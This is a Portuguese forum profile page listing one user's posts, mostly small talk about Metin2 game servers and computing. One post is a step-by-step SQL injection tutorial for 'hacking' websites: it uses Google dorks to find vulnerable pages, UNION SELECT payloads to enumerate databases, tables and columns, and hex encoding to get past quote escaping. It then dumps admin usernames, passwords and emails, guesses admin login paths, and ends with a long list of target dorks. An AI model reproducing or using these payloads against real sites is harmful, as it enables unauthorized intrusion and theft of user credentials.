antiblock
Cyphriun

ɓʀuɳѳ' ИИ#92

Membro
  • Content Count

    600
  • Joined

  • Last visited

Everything posted by ɓʀuɳѳ' ИИ#92

  1. - Tou a ver que nesse servidor vai haver estrondeira e tráfico de chocapitos e farinha pa panados '-'.
  2. - Depende do contexto do site de metin2 mas proteção não é :)
  3. - Se a memoria nao me falha isso serve para codificar o conteudo que o browser vai aceitar e vai retornar a saida de acordo. ( e tambem enviar arquivos comprimidos ) - Mas este code é preferivel em vez de ob_gzhandler -> ini.zlib.output_compression
  4. Desculpem nao resisti '-' Era minha namorada em bebe '-'
  5. - Corre o anti-virus ( avast ou norton )
  6. - Mas tá agora, esqueci-me ¬¬' - Agora havias de ccomer esse spam todo que fizes-te ¬¬'
  7. Boas comunidade venho aqui ensinar o metodo de hacker servidores ou páginas web.. Sql injection serve para ter acesso as bases de dados do servidor / web.. Comecemos .. Parte I - Avaliação de Site - Encontrar um site vulnerável - Determinação da quantidade de colunas - Encontrar as colunas que são vulneráveis Parte II - Recolha de informação - Determinar a versão do SQL - Encontrar o banco de dados Parte III - A parte boa - Encontrar os nomes de tabela - Encontrar os nomes das colunas - Exibindo o conteúdo da coluna - Encontrar a página de administração Vamos começar agora. Parte I - Avaliação de Site E altura de começarmos a explorar um site é preciso primeiro saber exatamente o que estamos a injetar. Isto é o que vamos fazer a cobertura na primeira parte, juntamente com a forma de avaliar a informação que recolhemos. Encontrar um site vulnerável Sites vulneráveis ​​podem ser encontrados usando dorks, seja no Google ou com um scanner de exploração. Se você não está familiarizado com o termo "dorks", Dorks são URLs de sites que possivelmente são vulneráveis. Na injeção de SQL estas dorks parecido com este: inurl:page.php?id=Este será introduzido na barra de busca do Google e por causa da "inurl:" parte da dork, o motor de busca irá retornar resultados com URLs que contenham os mesmos caracteres. Alguns dos locais que têm este idiota em seu site pode ser vulnerável a injeção de SQL. Agora vamos dizer que encontrei a página: http://www.thesite.com/page.php?id=1A fim de testar este site tudo o que precisamos fazer é adicionar um 'ou entre o sinal "=" e "1" ou depois do "1" para que ele se parece com isso: http://www.thesite.com/page.php?id=1'ouhttp://www.thesite.com/page.php?id='1Após pressionar ENTER, se este site retorna um erro como o seguinte: Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home1/michafj0/public_html/gallery.php on line 5Ou algo parecido.. Determinação da quantidade de colunas Se quisermos usar comandos e obter resultados, devemos saber quantas colunas existem num site. Para encontrar o número de colunas que escrever uma consulta com o incremento valores até temos um erro, como esta: http://www.thesite.com/page.php?id=1 ORDER BY 1-- &--#60;---No errorhttp://www.thesite.com/page.php?id=1 ORDER BY 2-- &--#60;---No errorhttp://www.thesite.com/page.php?id=1 ORDER BY 3-- &--#60;---No errorhttp://www.thesite.com/page.php?id=1 ORDER BY 4-- &--#60;---No errorhttp://www.thesite.com/page.php?id=1 ORDER BY 5-- &--#60;---ERROR!Isto significa que existe 4 colunas NÃO se esqueça de incluir o duplo nulo (--) após a consulta. MUITO IMPORTANTE! Encontrar as colunas que são vulneráveis Então, nós sabemos que há quatro colunas agora nós temos que descobrir quais são vulneráveis ​​a injeção. Para fazer isso, vamos utilizar o UNION e consultas SELECT enquanto mantendo o nulo duplo (--) no final da cadeia. http://www.thesite.com/page.php?id=-1 UNION SELECT 1,2,3,4--Não te esqueças de colocar o nulo extra (-) entre o sinal "=" eo valor (o número) page.php?id=-1 Agora, depois de entrar a consulta deves ser capaz de ver alguns números em algum lugar da página que parece fora do lugar. Esses são os números das colunas que são vulneráveis a injecção. Podemos usar essas colunas para extrair informações do banco de dados que veremos na segunda parte. Parte II - Recolha de informação Nesta parte, vamos descobrir como encontrar o nome da versão do banco de dados do SQL e que o site está usando usando consultas para explorar o local. Determinar a versão do SQL. Encontrar a versão do SQL do site é um passo muito importante, porque os passos a tomar para a versão. Se olharmos para trás até o fim da primeira parte, vimos como encontrar as colunas vulneráveis. Usando essa informação, podemos montar a nossa consulta seguinte (vou usar coluna 2 como um exemplo). O comando deve ficar assim: http://www.thesite.com/page.php?id=-1 UNION SELECT 1,@@version,3,4--Porque 2 é a coluna vulnerável, este é o lugar onde vamos colocar "@ @ version". Outra seqüência que poderia substituir "@ @ version" é "versão ()". Se o site ainda não exibe a versão tente usar unhex (hex ()) que se parece com esta: http://www.thesite.com/page.php?id=-1 UNION SELECT 1,unhex(hex(@@version)),3,4--NOTA: Se este método for utilizado aqui, deve ser utilizado para o resto da injeção, bem. Agora o que tu queres ver é algo ao longo destas linhas: 5.1.44-community-log Encontrar o banco de dados Para encontrar o banco de dados que utilizar uma consulta como a abaixo: http://www.thesite.com/page.php?id=-1 UNION SELECT 1,group_concat(schema_name),3,4 from information_schema.schemata--Isso pode, por vezes, retornar resultados mais do que o necessário e assim que é quando passar a esta consulta: http://www.thesite.com/page.php?id=-1 UNION SELECT 1,concat(database()),3,4--Você agora tem o nome do banco de dados! Parabéns. Copie e cole o nome num lugar seguro, vamos precisar dele para mais tarde. Parte III - A parte boa Esta é a parte divertida, onde vamos encontrar os nomes de usuário, e-mails e senhas! Encontrar os nomes de tabela Para encontrar os nomes de tabela que usamos uma consulta que é semelhante ao utilizado para encontrar a base de dados com um pouco extra acrescentado em: http://www.thesite.com/page.php?id=-1 UNION SELECT 1,group_concat(table_name),3,4 FROM information_schema.tables WHERE table_schema=database()--Pode parecer longo e confuso, mas uma vez que tu entenderes, não é realmente assim. O que esta consulta faz é que "grupos" (GROUP_CONCAT) os "nomes de tabela" (table_name) juntos e que reúne informações "de" (DE) information_schema.tables onde o "esquema de tabela" (table_schema) podem ser encontrados no "banco de dados" (banco de dados ()). NOTA: Ao usar GROUP_CONCAT tu só seras capaz de ver 1024 caracteres no valor de mesas para se notar que uma mesa é cortado no interruptor final sobre a limitar que eu vou explicar agora. http://www.thesite.com/page.php?id=-1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1--O que isto significa é que mostra o primeiro e único a primeira tabela. Então, se nós estávamos a correr para fora de caracteres sobre Vamos dizer que a tabela 31 podemos usar esta consulta: http://www.thesite.com/page.php?id=-1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables WHERE table_schema=database() LIMIT 30,1--Observa como o meu limite era 30,1 em vez de 31,1? Isto é porque quando se utiliza limite é iniciado a partir de 0,1, o que significa que a 30 é na verdade a língua 31 Você agora tem todos os nomes da tabela! Encontrar os nomes de coluna Agora que tu tens todos os nomes de tabela e tentar escolher o que tu achas que deve conter a informação suculenta. Geralmente são tabelas como usuário (s), administrador (s), tblUser (s) e assim por diante, mas varia entre locais. Depois de decidir qual tabela que tu achas que contém as informações, use esta consulta (no meu exemplo, eu vou estar a usar a tabela de nome "Admin"): http://www.thesite.com/page.php?id=-1 UNION SELECT 1,group_concat(column_name),3,4 FROM information_schema.columns WHERE table_name="Admin"--Isto poderá dar-te uma lista de todas as colunas na tabela ou dar-te um erro, mas não se preocupes se é resultado # 2! Tudo isso significa que Magic Quotes é ligado. Isso pode ser contornado através de um conversor hex ou char (ambos trabalham) para converter o texto normal em char ou hexadecimal. UPDATE: Se você receber um erro neste momento tudo o que tu deves fazer é seguir estes passos: 1. Copie o nome da tabela que tu estás a tentar acessar. 2. Cola o nome da tabela para este site onde diz "Say hello to my little friend". Hex / Char Conversor http://www.swingnote.com/tools/texttohex.php 3. Clique converter. 4. Copiar a seqüência de números / letras em Hex na tua consulta para que ele se pareça com isso: http://www.thesite.com/page.php?id=-1 UNION SELECT 1,group_concat(column_name),3,4 FROM information_schema.columns WHERE table_name=0x41646d696e--Observa como antes eu colei o hexa, eu adicionei um "0x", tudo isso faz é o servidor diz que as personagens a seguir são parte de uma cadeia hexadecimal. Tu deves ver agora uma lista de todas as colunas na tabela, como nome de usuário, e-mail, senha e. NOTA: Usar a função de limite da trabalho com colunas também. Exibindo o conteúdo da coluna Estamos quase a terminar! Tudo o que temos a fazer é ver o que há dentro dessas colunas e utilizar as informações para entrar! Para ver as colunas precisamos decidir quais as que quero ver e depois usar essa consulta (neste exemplo, eu quero ver as colunas "username", "password", e "e-mail", e meu nome do banco será "db123"). isto é onde o nome do banco de dados vem a calhar: http://www.thesite.com/page.php?id=-1 UNION SELECT 1,group_concat(username,0x3a,password,0x3a,email),3,4 FROM db123.Admin--Nesta consulta, 0x3a é o valor hexadecimal de dois pontos (:) que vai agrupar o usuário: senha: e-mail para os usuários individuais apenas como aquele. FINALMENTE! Agora tu tens as informações de login para os usuários do site, incluindo o administrador. Tudo que tu tens a fazer agora é encontrar a página de login de administrador que nos traz a Seção Quatro. Encontrar a página de administração Normalmente, a página de administração será diretamente fora da página inicial do site, aqui estão alguns exemplos: http://www.thesite.com/adminhttp://www.thesite.com/adminloginhttp://www.thesite.com/modloginhttp://www.thesite.com/moderatorMais uma vez, existem programas que vai encontrar a página para ti, mas primeiro tenta algumas das suposições básicas, que poderia poupar-lhe um par de cliques. Se você usar um programa de Reiluke foi codificado uma para isso também. Pesquisar Localizador Admin Reiluke. Uma lista de " idiotas " usada. Dork List trainers.php?id= article.php?ID= play_old.php?id= declaration_more.php?decl_id= Pageid= games.php?id= newsDetail.php?id= staff_id= historialeer.php?num= product-item.php?id= news_view.php?id= humor.php?id= communique_detail.php?id= sem.php3?id= opinions.php?id= spr.php?id= pages.php?id= chappies.php?id= prod_detail.php?id= viewphoto.php?id= view.php?id= website.php?id= hosting_info.php?id= gery.php?id= detail.php?ID= publications.php?id= Productinfo.php?id= releases.php?id= ray.php?id= produit.php?id= pop.php?id= shopping.php?id= productdetail.php?id= post.php?id= section.php?id= theme.php?id= page.php?id= shredder-categories.php?id= product_ranges_view.php?ID= shop_category.php?id= channel_id= newsid= news_display.php?getid= ages.php?id= clanek.php4?id= review.php?id= iniziativa.php?in= curriculum.php?id= labels.php?id= look.php?ID= galeri_info.php?l= tekst.php?idt= newscat.php?id= newsticker_info.php?idn= rubrika.php?idr= offer.php?idf=E tudo, eu sei que isto não é muito usado hoje em dia mas cá fica Continuação, cumprimentos Créditos : Google
  8. - Posso, se alguém for bom no que faz e tiver gosto pelo que faz irá sempre arranjar trabalho.. informática é um tema muito abrangente .. Ano passado o meu professor tambem me disse " Montar computadores? Isso qualquer um pega no manual e monta e desmonta .. Agora redes? tem muita saida " concordo cntg se tiveres a falar de hardware e isso pq e muito facil montar e desmontar pc's agora programação e redes já tem muito que se lhe diga. - Cumprimentos
  9. - Nâo tens meio de pagamento por móvel? - Cumprimentos
  10. Tu jogas cs source xb tas no cla da minha turma yh?
  11. Quem mandar pm recebe um item qql de 400 md's no mylastpvp pm ( o/a mais fofo/a recebe (; ) -( Disponivel ate dia 23 )- Podem mandar enquanto tiver off tambem d: only available on skype :p

    1. ɓʀuɳѳ' ИИ#92

      ɓʀuɳѳ' ИИ#92

      Da para pull ou brincos 105 :3

    2. ɓʀuɳѳ' ИИ#92

      ɓʀuɳѳ' ИИ#92

      E levam um chapeu de oferta :3 e axo que tenho penteado renas xd

    3. EpicFace

      EpicFace

      eu tenho isso tudo tou full ISs xD

    4. Show next comments  66 more
  12. - Ainda bem que parei de jogar metin2 porque daqui a bocado até se vai ver florzinhas em vez de armas. - Mas obg por postares..
  13. - Deixa em branco. (ou se não der pa ficar em branco deixas 0)
  14. - Isto é uma comunidade não só do cgmt2, se não era para fazer publicidade a outros servidores teria que apagar a zona de metin2.